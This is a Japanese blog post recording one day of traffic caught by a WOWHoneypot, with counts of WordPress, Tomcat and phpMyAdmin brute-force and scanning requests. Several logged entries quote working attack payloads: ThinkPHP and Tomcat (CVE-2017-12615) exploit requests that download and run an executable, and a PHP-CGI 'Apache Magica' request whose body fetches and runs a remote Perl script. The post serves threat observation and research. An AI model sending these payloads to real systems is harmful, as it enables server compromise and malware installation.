23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(33日目)

2019/04/18(木)

トータルは3472件でした。

件数 概要 リクエス
2551 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
52 アクセス GET /
33 WordPressの調査 GET /wp5/wp-login.php
33 WordPressの調査 GET /wp/wp-login.php
32 WordPressブルートフォース攻撃 POST /wp5/xmlrpc.php
32 WordPressの調査 POST /wp5/wp-login.php
32 WordPressの調査 POST /wp3/wp-login.php
32 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp/xmlrpc.php
32 WordPressブルートフォース攻撃 POST /wp/wp-login.php
32 WordPressの調査 GET /wp6/wp-login.php
32 WordPressの調査 GET /wp3/wp-login.php
32 WordPressの調査 GET /wordpress/wp-login.php
31 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp6/xmlrpc.php
31 WordPressブルートフォース攻撃 POST /wp6/wp-login.php
31 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp3/xmlrpc.php
31 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wordpress/xmlrpc.php
31 WordPressブルートフォース攻撃 POST /wordpress/wp-login.php
31 WordPressの調査 GET /wp4/wp-login.php
31 WordPressの調査 GET /cms/wp-login.php
30 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp4/xmlrpc.php
30 WordPressブルートフォース攻撃 POST /wp4/wp-login.php
30 WordPress の Pingback を狙ったブルートフォース攻撃 POST /cms/xmlrpc.php
29 WordPressブルートフォース攻撃 POST /cms/wp-login.php
29 WordPressの調査 GET /wp2/wp-login.php
28 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp2/xmlrpc.php
28 WordPressブルートフォース攻撃 POST /wp2/wp-login.php
17 WordPressの調査 GET /blog/wp-login.php
16 WordPress の Pingback を狙ったブルートフォース攻撃 POST /blog/xmlrpc.php
16 WordPressブルートフォース攻撃 POST /blog/wp-login.php
13 不正中継の調査 GET hxxp://checkip.dyndns.com/
4 調査 OPTIONS /
3 ZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
3 ZmEuによるphpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
3 ZmEuによるphpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
2 ZmEuによるphpMyAdminの調査 GET /pma/scripts/setup.php
2 D-Linkルータの調査 GET /HNAP1/
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) PUT /FxCodeShell.jsp::$DATA
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) PUT /FxCodeShell.jsp/
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) PUT /FxCodeShell.jsp%20
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) POST /TP/public/index.php?s=captcha
1 CGIPHPへのApache Magica攻撃 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 不正中継の調査 GET hxxp://www.ceek.jp/?rands=_54563759842233047844248
1 不正中継の調査 GET hxxp://www.baidu.com/?rands=_99481943049317162532024
1 アクセス GET hxxp/1.1"
1 WordPressのユーザー情報の調査 GET /wp6//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wp6//?author=1
1 WordPressのユーザー情報の調査 GET /wp5//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wp5//?author=1
1 WordPressのユーザー情報の調査 GET /wp4//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wp4//?author=1
1 WordPressのユーザー情報の調査 GET /wp3//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wp3//?author=1
1 WordPressのユーザー情報の調査 GET /wp2//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wp2//?author=1
1 WordPressのユーザー情報の調査 GET /wp//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wp//?author=1
1 WordPressのユーザー情報の調査 GET /wordpress//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /wordpress//?author=1
1 ThinkPHPの脆弱性を狙った通信 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','C:/Windows/temp/ptyjkstuofkhvaa19922.exe');start%20C:/Windows/temp/ptyjkstuofkhvaa19922.exe
1 ThinkPHPの脆弱性を狙った通信 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php
1 ThinkPHPの脆弱性を狙った通信 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','C:/Windows/temp/ptyjkstuofkhvaa19922.exe');start%20C:/Windows/temp/ptyjkstuofkhvaa19922.exe
1 phpMyAdminの調査 GET /phpmy/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 phpMyAdminの調査 GET /muieblackcat
1 アクセス GET /favicon.ico
1 WordPressのユーザー情報の調査 GET /cms//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /cms//?author=1
1 WordPressのユーザー情報の調査 GET /blog//wp-json/wp/v2/users/
1 WordPressのユーザー情報の調査 GET /blog//?author=1
1 Kubernetesの調査 GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp
1 WordPressの調査 GET /administrator/index.php
1 phpMyAdminの調査 GET /admin-scripts.asp
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe
1 phpMyAdminの調査 GET //pma/scripts/setup.php
1 phpMyAdminの調査 GET //phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET //phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET //myadmin/scripts/setup.php
1 phpMyAdminの調査 GET //MyAdmin/scripts/setup.php

以下、初めて観測した通信です。

CGIPHPへのApache Magica攻撃

リクエストのボディ部にスクリプトがありました。
時間があるときにでもしっかり読みたいと思います。

POST //cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 176


<? system("cd /tmp ; wget hxxp://timradio.hi2.ro/unix ; curl -O hxxp://timradio.hi2.ro/unix ; fetch hxxp://timradio.hi2.ro/unix ; chmod +x unix ; perl unix ; rm -rf unix "); ?>

Kubernetesの調査

GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip
host: *.*.*.*:8080
Connection: close

参考URL

調査にあたり参考にさせていただきました。ありがとうございます。
sec-owl.hatenablog.com

blog.tokumaru.org